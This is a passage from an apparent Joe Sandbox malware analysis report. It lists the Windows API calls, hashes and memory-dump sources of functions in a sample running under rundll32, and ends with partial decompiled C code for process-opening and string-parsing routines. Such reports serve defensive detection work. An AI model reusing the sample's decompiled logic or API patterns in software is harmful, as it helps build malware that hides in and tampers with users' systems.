                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 05580566
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,0558820A,00000000,?,?,?,00000000,?,05582174), ref: 05580592
                                                          • GetLastError.KERNEL32(?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 055805B7
                                                          • CloseHandle.KERNEL32(000000FF,?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 055805C8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateErrorHandleLastReadSize
                                                          • String ID:
                                                          • API String ID: 3577853679-0
                                                          • Opcode ID: b82054ffdd1a8c1365c496f1ca19ec361c3b81aab8c6e926bac80c0b91921693
                                                          • Instruction ID: 05342dbe9171a0b391df57c6493ebf59d749f91fef78cbe2a18c949341f42b56
                                                          • Opcode Fuzzy Hash: b82054ffdd1a8c1365c496f1ca19ec361c3b81aab8c6e926bac80c0b91921693
                                                          • Instruction Fuzzy Hash: FC118172600219EFDB207F64C888ABE7A59BB45690F014526F952B71A0DB30A94C96B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05571B5E, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000002C), ref: 05571B6F
                                                          • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 05571B88
                                                          • StrTrimA.SHLWAPI(?,?), ref: 05571BB0
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 05571BBF
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 05571BF6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Trim$FreeHeap
                                                          • String ID:
                                                          • API String ID: 2132463267-0
                                                          • Opcode ID: 4a2103671c0c92964063d363f2f3f3c2450ae9349266274ae4bda792250bde9b
                                                          • Instruction ID: 73fa8f8a21db028918297e075e5e00fa153b95b292ea9761a24300291b46f483
                                                          • Opcode Fuzzy Hash: 4a2103671c0c92964063d363f2f3f3c2450ae9349266274ae4bda792250bde9b
                                                          • Instruction Fuzzy Hash: 6311C87621060ABBE7119A99ECCAFAB7FADFB84650F110022BA09DB140EF74D805D790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557A54C, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?,?,?), ref: 0557A583
                                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?), ref: 0557A5B3
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557A5C2
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 0557A5E0
                                                          • GetLastError.KERNEL32(?,?), ref: 0557A5F0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          • Opcode ID: 0443d64e60a144af0a57acf16f5181c9dd58f8ff4829cf36aaaa23f0254b93c7
                                                          • Instruction ID: 028c89d5a2a79b11422c5fb5904117e3d5410f9e4b2690b18efbecaa38fa059c
                                                          • Opcode Fuzzy Hash: 0443d64e60a144af0a57acf16f5181c9dd58f8ff4829cf36aaaa23f0254b93c7
                                                          • Instruction Fuzzy Hash: 4121F5B5600B06AFCB10CFA9D98595AFBF8FF08300B00462AEA5693710DB74F948DB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055840B0, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 055840DE
                                                          • GetLastError.KERNEL32 ref: 05584101
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05584114
                                                          • GetLastError.KERNEL32 ref: 0558411F
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05584167
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1671499436-0
                                                          • Opcode ID: 185c69a9a13981c1b52e3dd01f7e7e9ef7b8f4f23b6572ac9459f0bdbb84c28d
                                                          • Instruction ID: ded50f2f662f023a8450d95d47456260d3881f8c5391ad7ee88e74242d6dcc63
                                                          • Opcode Fuzzy Hash: 185c69a9a13981c1b52e3dd01f7e7e9ef7b8f4f23b6572ac9459f0bdbb84c28d
                                                          • Instruction Fuzzy Hash: AA219D30504245EBEF20AF50DD8AB6A7FBAFB50359F210419F512A65A0DB79B988DB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557E8A2, Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0557E8B6
                                                          • memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000,?,00000000), ref: 0557E8DF
                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 0557E908
                                                          • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000), ref: 0557E928
                                                          • RegCloseKey.ADVAPI32(00000000,?,055761AF,00000000,00000000,00000001,?,0557D44F,00000020,00000000,?,00000000,?,00000000,00000000), ref: 0557E933
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Value$AllocateCloseCreateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2954810647-0
                                                          • Opcode ID: 4b01874adf8297c826f2e5e20088d41f4cca5a758428ea025f0fdba2b5ed37fc
                                                          • Instruction ID: 53f3a274d5c94d394ed11bc595d89ecb1ad371f406441ad6179ffb15349464d0
                                                          • Opcode Fuzzy Hash: 4b01874adf8297c826f2e5e20088d41f4cca5a758428ea025f0fdba2b5ed37fc
                                                          • Instruction Fuzzy Hash: 5D11A73221420DFBDF215E74BC46EBA7A6EFB44651F050026FD01E2190DA718D209A61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05577C14, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05577C31
                                                          • memcpy.NTDLL(?,?,00000009), ref: 05577C53
                                                          • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 05577C6B
                                                          • lstrlenW.KERNEL32(?,00000001,?), ref: 05577C8B
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 05577CB0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3065863707-0
                                                          • Opcode ID: 594861de9fbf5b6614d07e1cb7fbd9cdd55d4f509e2f4b70bb34c48befe0acc2
                                                          • Instruction ID: 559c4d6b42a619babb05ef1b61df0b923052d663f91796ac2a0c07946c334c62
                                                          • Opcode Fuzzy Hash: 594861de9fbf5b6614d07e1cb7fbd9cdd55d4f509e2f4b70bb34c48befe0acc2
                                                          • Instruction Fuzzy Hash: FD119336A1020DBBCB209BA5E84AF9E7FBCEB4C310F014052FA05E2280DA74D64CDB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557B0A8, Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcmpi.KERNEL32(00000000,?), ref: 0557B0D7
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 0557B0E4
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 0557B0F7
                                                          • lstrcmpi.KERNEL32(0559C340,00000000), ref: 0557B117
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557B897,00000000), ref: 0557B12B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                                          • String ID:
                                                          • API String ID: 1266740956-0
                                                          • Opcode ID: 78617caa0390a366ed1cca95180bdcecc409302f3f424af416631996dda5e642
                                                          • Instruction ID: eb78957e5fc4b15a88bee59cdbb21c40958bd94edc1143c806db2121cf401ab8
                                                          • Opcode Fuzzy Hash: 78617caa0390a366ed1cca95180bdcecc409302f3f424af416631996dda5e642
                                                          • Instruction Fuzzy Hash: 93115131910209EFDF04DB59D845A9ABBF8FF04324F454156F40AD3250DB38AD09DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05589E0B, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000008,05576149,00000000,00000000,00000000,75145520,00000000,?,0557D44F,00000020,00000000,?,00000000), ref: 05589E15
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05589E39
                                                          • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0557D44F,00000020,00000000,?,00000000,?,00000000,00000000), ref: 05589E40
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05589E88
                                                          • lstrcat.KERNEL32(00000000,?), ref: 05589E97
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                                          • String ID:
                                                          • API String ID: 2616531654-0
                                                          • Opcode ID: bdb9c743a388fecd806eb2e6b257b926c774b596bacc7739d4934208788ffc3a
                                                          • Instruction ID: 8333d81ebaba522c1a14a90ca21f835ff945190a5217c305bba811aea03195bc
                                                          • Opcode Fuzzy Hash: bdb9c743a388fecd806eb2e6b257b926c774b596bacc7739d4934208788ffc3a
                                                          • Instruction Fuzzy Hash: BB117076204206ABD7209AA6A889E7B7FFDBB84650F05452AF54AE3100DF28E8499761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05576312, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05586FEB: lstrlen.KERNEL32(?,00000000,?,00000000,05592373,?,?,00000000,?,05582161,?,?,?,?), ref: 05586FF7
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0557633B
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0557634E
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 0557635F
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05576374
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 055763AC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 2349942465-0
                                                          • Opcode ID: fe5214f78bbb92ec9007da2fa4572012ccfdbafc8c001776b1e83514ba1b9139
                                                          • Instruction ID: 07aaffc1b93ab9f54f1619378c856a2f1cd7ce252121e74dab4b054082ed9d27
                                                          • Opcode Fuzzy Hash: fe5214f78bbb92ec9007da2fa4572012ccfdbafc8c001776b1e83514ba1b9139
                                                          • Instruction Fuzzy Hash: C811E576214315AFDB105F24FC89C2B7FA9FB85322702013AF80693200CE39AC09DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05593D12, Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(05571A31,00000000,?,00000000,?,0557A44D,?,05571A31,00000000), ref: 05593D28
                                                          • lstrlen.KERNEL32(?,?,0557A44D,?,05571A31,00000000), ref: 05593D2F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 05593D3D
                                                            • Part of subcall function 055762C0: GetLocalTime.KERNEL32(0557A44D,0557A44D,?,05571A31,00000000), ref: 055762CA
                                                            • Part of subcall function 055762C0: wsprintfA.USER32 ref: 055762FD
                                                          • wsprintfA.USER32 ref: 05593D5F
                                                            • Part of subcall function 05581EB1: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,05593D87,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05581ECF
                                                            • Part of subcall function 05581EB1: wsprintfA.USER32 ref: 05581EF4
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05593D90
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                          • String ID:
                                                          • API String ID: 3847261958-0
                                                          • Opcode ID: 52a8996b61e82d5f9db1bcf6cfa9ea596a6d0f5f0e3fd707c33f3f322010dd71
                                                          • Instruction ID: 3072ec962ffb1562feba6f5ad9492f255a2a96ab58b6a231ddd441b5be0e386c
                                                          • Opcode Fuzzy Hash: 52a8996b61e82d5f9db1bcf6cfa9ea596a6d0f5f0e3fd707c33f3f322010dd71
                                                          • Instruction Fuzzy Hash: FA018831140219FBDF112F56EC49DAA7F6DFFC43B0B024412FD1996110DA3A9959DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557EE3D, Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0557EE54
                                                            • Part of subcall function 05588A11: wcstombs.NTDLL ref: 05588ACF
                                                          • lstrlen.KERNEL32(?,?,?,?,?,0558CAD6,00000000,00000000), ref: 0557EE77
                                                          • lstrlen.KERNEL32(?,?,?,?,0558CAD6,00000000,00000000), ref: 0557EE81
                                                          • memcpy.NTDLL(?,?,00004000,?,?,0558CAD6,00000000,00000000), ref: 0557EE92
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,0558CAD6,00000000,00000000), ref: 0557EEB4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                                                          • String ID:
                                                          • API String ID: 1256246205-0
                                                          • Opcode ID: 45c3c2325f6c54badc58ff2104554b43d900a28bb4afae61dcd0e002919655fa
                                                          • Instruction ID: a9633b2a7b37d601ef3162bef5ea016d414d5a7b2fd6175ae3ce9135b8f3a332
                                                          • Opcode Fuzzy Hash: 45c3c2325f6c54badc58ff2104554b43d900a28bb4afae61dcd0e002919655fa
                                                          • Instruction Fuzzy Hash: 9E118E75610208EFDB109F65EC46F6ABFB9FB84360F1148A9F906A3250D731A9489B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055760A2, Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,05577CF7,?), ref: 055760CE
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 055760E0
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05577CF7,?), ref: 055760FD
                                                          • lstrlenW.KERNEL32(00000000,?,?,05577CF7,?), ref: 05576109
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,05577CF7,?), ref: 0557611D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                                          • String ID:
                                                          • API String ID: 3403466626-0
                                                          • Opcode ID: 1fbc757a566c0e5c81b54e3aeb2113129557bb56139d219a5230d9b0f0d12aa1
                                                          • Instruction ID: 8d1dc59ed5bd5657dae6dd1c87af17f5a2f28b8ae015a785709fbec0ccc37756
                                                          • Opcode Fuzzy Hash: 1fbc757a566c0e5c81b54e3aeb2113129557bb56139d219a5230d9b0f0d12aa1
                                                          • Instruction Fuzzy Hash: A7019E72110208EFDB11AB99EC8AF9E7BACFF09324F020012F50597151DF78A90CEBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055838A4, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32 ref: 055838C4
                                                          • GetModuleHandleA.KERNEL32 ref: 055838D2
                                                          • LoadLibraryExW.KERNEL32(?,?,?), ref: 055838DF
                                                          • GetModuleHandleA.KERNEL32 ref: 055838F6
                                                          • GetModuleHandleA.KERNEL32 ref: 05583902
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HandleModule$LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1178273743-0
                                                          • Opcode ID: c86acb440b483b02c154705ef61a566470d619d2d6b62c533172cdc36e643d63
                                                          • Instruction ID: 139445d229b301f366d19a6ee7f436599abbdc1e348b4a1622b2aa9beb481690
                                                          • Opcode Fuzzy Hash: c86acb440b483b02c154705ef61a566470d619d2d6b62c533172cdc36e643d63
                                                          • Instruction Fuzzy Hash: A301623171430A9BAB01AF69EC42D767FADFB446B0706043BF915D2260DFA6DC25EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05576B45, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 05576B50
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 05576B61
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,055740DA,00000000,?,0559C328,0558046F,00000003,?,?,?,0557CC1E), ref: 05576B78
                                                          • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,055740DA,00000000,?,0559C328,0558046F,00000003,?,?,?,0557CC1E), ref: 05576B92
                                                          • GetLastError.KERNEL32(?,?,055740DA,00000000,?,0559C328,0558046F,00000003,?,?,?,0557CC1E,00000000,?,00000029,0559C140), ref: 05576B9F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          • Opcode ID: fdfb32b1a876df9d9ced5c6ed4f9de096bde6a7d38df34f14534b873dfe30805
                                                          • Instruction ID: cf38c7ed732c1df1355a7165051a479af0b08c4eeb6a0cbd3cf9350043692e7c
                                                          • Opcode Fuzzy Hash: fdfb32b1a876df9d9ced5c6ed4f9de096bde6a7d38df34f14534b873dfe30805
                                                          • Instruction Fuzzy Hash: 30018F79200704EFDB209F15DC05D6ABBB9FF85361B114519FA5693250CB30F9059B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558230A, Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 05582317
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,0557AA7A,00000000,?), ref: 05582327
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,0557AA7A,00000000,?), ref: 05582330
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,055862BC,?,?,00000040,?,?,?,?,?,?,0557AA7A), ref: 0558234E
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,055862BC,?,?,00000040,?,?,?,?,?,?,0557AA7A), ref: 0558235B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3667519916-0
                                                          • Opcode ID: ffc2928f80696a5acb81ea47b348a5ec136a9fdc6a1a427d5228b7b5392f9c7d
                                                          • Instruction ID: cb7f9d1447a61f2e72c08be28441618f62f9bc15dea52be0deaf2a32424073ae
                                                          • Opcode Fuzzy Hash: ffc2928f80696a5acb81ea47b348a5ec136a9fdc6a1a427d5228b7b5392f9c7d
                                                          • Instruction Fuzzy Hash: 62F09A75200704AFEA206B35EC48F26BAA8FF44311F14061AF142A2590CF28E809DE24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05589DA0, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05590A3D,?), ref: 05589DA8
                                                          • GetVersion.KERNEL32 ref: 05589DB7
                                                          • GetCurrentProcessId.KERNEL32 ref: 05589DC6
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05589DE3
                                                          • GetLastError.KERNEL32 ref: 05589E02
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: b86d6a04d95efa828cdeb83870e9fbba2618719ce9a272b8d3169095887e020f
                                                          • Instruction ID: 6093e70b304e694135b62f7111a6d5a9be5b9c8d84e5a18ef60603c20b93c4a6
                                                          • Opcode Fuzzy Hash: b86d6a04d95efa828cdeb83870e9fbba2618719ce9a272b8d3169095887e020f
                                                          • Instruction Fuzzy Hash: 76F0B7706A03409FE7209F24A88BB353FB5B704B81F52491BF516D52D0DF799548FB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E51DFA, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E51DFA(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xe5a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xe5a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xe5a2b0 = _t6;
				 *0xe5a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xe5a2ac = _t7;
				if(_t7 == 0) {
					 *0xe5a2ac =  *0xe5a2ac | 0xffffffff;
				}
				return 0;
			}








                                                          0x00e51e02
                                                          0x00e51e0a
                                                          0x00e51e0f
                                                          0x00000000
                                                          0x00e51e5c
                                                          0x00e51e11
                                                          0x00e51e19
                                                          0x00e51e59
                                                          0x00000000
                                                          0x00e51e59
                                                          0x00e51e1b
                                                          0x00e51e20
                                                          0x00e51e32
                                                          0x00e51e37
                                                          0x00e51e3d
                                                          0x00e51e45
                                                          0x00e51e4a
                                                          0x00e51e4c
                                                          0x00e51e4c
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00E5686A,?,?,00000001), ref: 00E51E02
                                                          • GetVersion.KERNEL32(?,00000001), ref: 00E51E11
                                                          • GetCurrentProcessId.KERNEL32(?,00000001), ref: 00E51E20
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00E51E3D
                                                          • GetLastError.KERNEL32(?,00000001), ref: 00E51E5C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 9060003e010d52940960c523277d740f4fd090eac2bfd17e2ab150a36288298b
                                                          • Instruction ID: c9646747f15f0aa7bcb39f56476db9dbd5be9e335d6a2128d043e6a60eeb49ba
                                                          • Opcode Fuzzy Hash: 9060003e010d52940960c523277d740f4fd090eac2bfd17e2ab150a36288298b
                                                          • Instruction Fuzzy Hash: 4BF06D74644301DFD7188F26AC0BB593BA9A704B43F144E29EA0AF51F0DBB1440CCF16
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E538DA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 47%
                                                          			E00E538DA(char* _a4, char _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E00E55FBC(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0xe592a4);
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
